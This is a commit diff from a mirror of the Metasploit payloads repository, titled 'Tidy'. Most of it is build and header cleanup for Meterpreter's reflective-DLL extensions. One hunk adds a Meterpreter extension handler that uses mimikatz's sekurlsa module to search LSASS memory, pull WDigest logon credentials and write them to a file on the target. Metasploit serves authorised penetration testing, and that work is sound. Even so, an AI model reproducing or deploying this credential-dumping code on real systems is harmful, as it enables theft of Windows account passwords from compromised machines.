mirror of
https://github.com/rapid7/metasploit-payloads
synced 2024-11-26 17:41:08 +01:00
Tidy
This commit is contained in:
Meatballs
parent
979e22f774
commit
21e2b1fecf
@ -35,15 +35,11 @@
|
||||
#pragma comment (lib,"Delayimp.lib")
|
||||
|
||||
// we use this like a macro to set the hook in an server extension that requires it
|
||||
#define EnableDelayLoadMetSrv() PfnDliHook __pfnDliNotifyHook2 = delayHook; // set our delay loader hook, see DelayLoadMetSrv.c
|
||||
#define EnableDelayLoadMetSrv() PfnDliHook __pfnDliNotifyHook2 = delayHook; // set our delay loader hook, see DelayLoadMetSrv.c
|
||||
|
||||
#ifdef __cplusplus
|
||||
extern "C" HMODULE hMetSrv;
|
||||
extern "C" FARPROC WINAPI delayHook( unsigned dliNotify, PDelayLoadInfo pdli );
|
||||
#else
|
||||
extern HMODULE hMetSrv;
|
||||
FARPROC WINAPI delayHook( unsigned dliNotify, PDelayLoadInfo pdli );
|
||||
#endif
|
||||
extern HMODULE hMetSrv;
|
||||
|
||||
FARPROC WINAPI delayHook( unsigned dliNotify, PDelayLoadInfo pdli );
|
||||
|
||||
//===============================================================================================//
|
||||
#endif
|
||||
|
||||
@ -183,7 +183,7 @@ geteip:
|
||||
while( usCounter > 0 )
|
||||
{
|
||||
// compute the hash values for this function name
|
||||
dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
|
||||
dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
|
||||
|
||||
// if we have found a function we want we get its virtual address
|
||||
if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH || dwHashValue == VIRTUALLOCK_HASH || dwHashValue == OUTPUTDEBUG_HASH )
|
||||
@ -435,22 +435,13 @@ geteip:
|
||||
#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
||||
|
||||
// you must implement this function...
|
||||
extern DWORD DLLEXPORT Init( SOCKET socket );
|
||||
|
||||
#ifdef __cplusplus
|
||||
extern "C" DWORD DLLEXPORT Init( SOCKET socket );
|
||||
extern "C" BOOL MetasploitDllAttach( SOCKET socket )
|
||||
{
|
||||
Init( socket ) ;
|
||||
return TRUE;
|
||||
}
|
||||
#else
|
||||
DWORD DLLEXPORT Init( SOCKET socket );
|
||||
BOOL MetasploitDllAttach( SOCKET socket )
|
||||
{
|
||||
Init( socket );
|
||||
return TRUE;
|
||||
}
|
||||
#endif
|
||||
|
||||
BOOL MetasploitDllDetach( DWORD dwExitFunc )
|
||||
{
|
||||
|
||||
@ -63,7 +63,7 @@ __forceinline DWORD ror( DWORD d )
|
||||
|
||||
|
||||
|
||||
__forceinline DWORD _hash( char * c )
|
||||
__forceinline DWORD hash( char * c )
|
||||
{
|
||||
register DWORD h = 0;
|
||||
do
|
||||
|
||||
@ -40,13 +40,8 @@ typedef struct command
|
||||
struct command *prev;
|
||||
} Command;
|
||||
|
||||
#ifdef __cplusplus
|
||||
extern "C" LINKAGE DWORD command_register(Command *command);
|
||||
extern "C" LINKAGE DWORD command_deregister(Command *command);
|
||||
#else
|
||||
LINKAGE DWORD command_register(Command *command);
|
||||
LINKAGE DWORD command_deregister(Command *command);
|
||||
#endif
|
||||
|
||||
LINKAGE VOID command_join_threads( VOID );
|
||||
|
||||
|
||||
@ -203,7 +203,7 @@ static void real_dprintf(char *format, ...) {
|
||||
va_start(args,format);
|
||||
vsnprintf_s(buffer, sizeof(buffer), sizeof(buffer)-3, format,args);
|
||||
strcat_s(buffer, sizeof(buffer), "\r\n");
|
||||
OutputDebugStringA(buffer);
|
||||
OutputDebugString(buffer);
|
||||
}
|
||||
|
||||
#endif
|
||||
|
||||
@ -1,18 +1,28 @@
|
||||
#ifndef _METERPRETER_SOURCE_EXTENSION_BOILER_BOILER_H
|
||||
#define _METERPRETER_SOURCE_EXTENSION_BOILER_BOILER_H
|
||||
#ifndef _METERPRETER_SOURCE_EXTENSION_MIMIKATZ_MIMIKATZ_H
|
||||
#define _METERPRETER_SOURCE_EXTENSION_MIMIKATZ_MIMIKATZ_H
|
||||
extern "C"
|
||||
{
|
||||
#include "../../common/common.h"
|
||||
}
|
||||
#endif
|
||||
|
||||
#include <io.h>
|
||||
#include <fcntl.h>
|
||||
#include <iostream>
|
||||
#include <fstream>
|
||||
|
||||
#include "mimikatz.h"
|
||||
|
||||
extern "C"
|
||||
{
|
||||
|
||||
#include "modules/mod_mimikatz_sekurlsa.h"
|
||||
|
||||
/* Benjamin DELPY `gentilkiwi`
|
||||
http://blog.gentilkiwi.com
|
||||
benjamin@gentilkiwi.com
|
||||
Licence : http://creativecommons.org/licenses/by-nc-sa/3.0/fr/
|
||||
*/
|
||||
#include "modules/globdefs.h"
|
||||
#include <io.h>
|
||||
#include <fcntl.h>
|
||||
#include "mimikatz.h"
|
||||
|
||||
|
||||
#include "../../ReflectiveDLLInjection/DelayLoadMetSrv.h"
|
||||
// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
|
||||
@ -20,11 +30,36 @@
|
||||
// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
|
||||
#include "../../ReflectiveDLLInjection/ReflectiveLoader.c"
|
||||
|
||||
|
||||
// this sets the delay load hook function, see DelayLoadMetSrv.h
|
||||
EnableDelayLoadMetSrv();
|
||||
|
||||
DWORD request_boiler(Remote *remote, Packet *packet)
|
||||
{
|
||||
packet_transmit_response(0, remote, packet);
|
||||
FILE *ficheiro = fopen("c:\\test.txt", "wb");
|
||||
fclose(ficheiro);
|
||||
std::wofstream logFile( "c:\\out.txt");
|
||||
std::wstreambuf *outbuf = std::wcout.rdbuf(logFile.rdbuf());
|
||||
std::wstreambuf *errbuf = std::wcerr.rdbuf(logFile.rdbuf());
|
||||
|
||||
vector<wstring> * mesArguments = new vector<wstring>();
|
||||
|
||||
mimikatz * myMimiKatz = new mimikatz(mesArguments);
|
||||
|
||||
vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider;
|
||||
monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(mod_mimikatz_sekurlsa_wdigest::getWDigestLogonData, wstring(L"wdigest")));
|
||||
|
||||
if (mod_mimikatz_sekurlsa::searchLSASSDatas())
|
||||
{
|
||||
mod_mimikatz_sekurlsa::getLogonData(mesArguments, &monProvider);
|
||||
}
|
||||
|
||||
std::wcout.rdbuf(outbuf);
|
||||
std::wcerr.rdbuf(errbuf);
|
||||
|
||||
packet_transmit_response(0, remote, packet);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
@ -73,6 +108,7 @@ DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
//int wmain(int argc, wchar_t * argv[])
|
||||
|
||||
@ -1,8 +1,3 @@
|
||||
#ifndef _METERPRETER_SOURCE_EXTENSION_BOILER_BOILER_H
|
||||
#define _METERPRETER_SOURCE_EXTENSION_BOILER_BOILER_H
|
||||
#include "../../common/common.h"
|
||||
#endif
|
||||
|
||||
/* Benjamin DELPY `gentilkiwi`
|
||||
http://blog.gentilkiwi.com
|
||||
benjamin@gentilkiwi.com
|
||||
@ -10,7 +5,7 @@
|
||||
*/
|
||||
#pragma once
|
||||
#include "modules/globdefs.h"
|
||||
#include "modules/mod_parseur.h"
|
||||
#include "modules/mod_parseur.h"
|
||||
#include "modules/mod_pipe.h"
|
||||
#include "modules/mod_process.h"
|
||||
#include "modules/mod_system.h"
|
||||
|
||||
@ -13,21 +13,12 @@
|
||||
* Entry point for the DLL (or not if compiled as an EXE)
|
||||
*/
|
||||
#ifdef _WIN32
|
||||
#ifdef __cplusplus
|
||||
extern "C" DWORD __declspec(dllexport) Init(SOCKET fd)
|
||||
{
|
||||
|
||||
return server_setup(fd);
|
||||
|
||||
}
|
||||
#else
|
||||
DWORD __declspec(dllexport) Init(SOCKET fd)
|
||||
{
|
||||
|
||||
return server_setup(fd);
|
||||
|
||||
}
|
||||
#endif
|
||||
#else
|
||||
|
||||
// rtld dynamically links libc/libm/libcrypto/libssl/metsrv_main
|
||||
|
||||
@ -65,8 +65,8 @@
|
||||
<OutDir Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">$(SolutionDir)$(Configuration)\</OutDir>
|
||||
<IntDir Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">$(Configuration)\</IntDir>
|
||||
<LinkIncremental Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</LinkIncremental>
|
||||
<OutDir Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">$(SolutionDir)$(Configuration)\</OutDir>
|
||||
<IntDir Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">$(Configuration)\</IntDir>
|
||||
<OutDir Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">$(Configuration)\$(Platform)\</OutDir>
|
||||
<IntDir Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">$(Configuration)\$(Platform)\</IntDir>
|
||||
<LinkIncremental Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</LinkIncremental>
|
||||
<GenerateManifest Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</GenerateManifest>
|
||||
<OutDir Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">$(SolutionDir)$(Configuration)\$(Platform)\</OutDir>
|
||||
@ -88,6 +88,8 @@
|
||||
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Release|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
|
||||
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Release|x64'" />
|
||||
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Release|x64'" />
|
||||
<TargetName Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">$(ProjectName).x86</TargetName>
|
||||
<TargetName Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">$(ProjectName).x86</TargetName>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
@ -109,6 +111,9 @@
|
||||
<TargetMachine>MachineX86</TargetMachine>
|
||||
<AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;;psapi.lib;advapi32.lib;user32.lib;secur32.lib;crypt32.lib;shlwapi.lib;wtsapi32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
</Link>
|
||||
<PostBuildEvent>
|
||||
<Command>copy /y "$(OutDir)$(TargetName)$(TargetExt)" "$(ProjectDir)..\..\output\"</Command>
|
||||
</PostBuildEvent>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
@ -150,6 +155,9 @@
|
||||
<TargetMachine>MachineX86</TargetMachine>
|
||||
<MinimumRequiredVersion>5.0</MinimumRequiredVersion>
|
||||
</Link>
|
||||
<PostBuildEvent>
|
||||
<Command>copy /y "$(OutDir)$(TargetName)$(TargetExt)" "$(ProjectDir)..\..\output\"</Command>
|
||||
</PostBuildEvent>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<Midl>
|
||||
|
||||
Loading…
Reference in New Issue
Block a user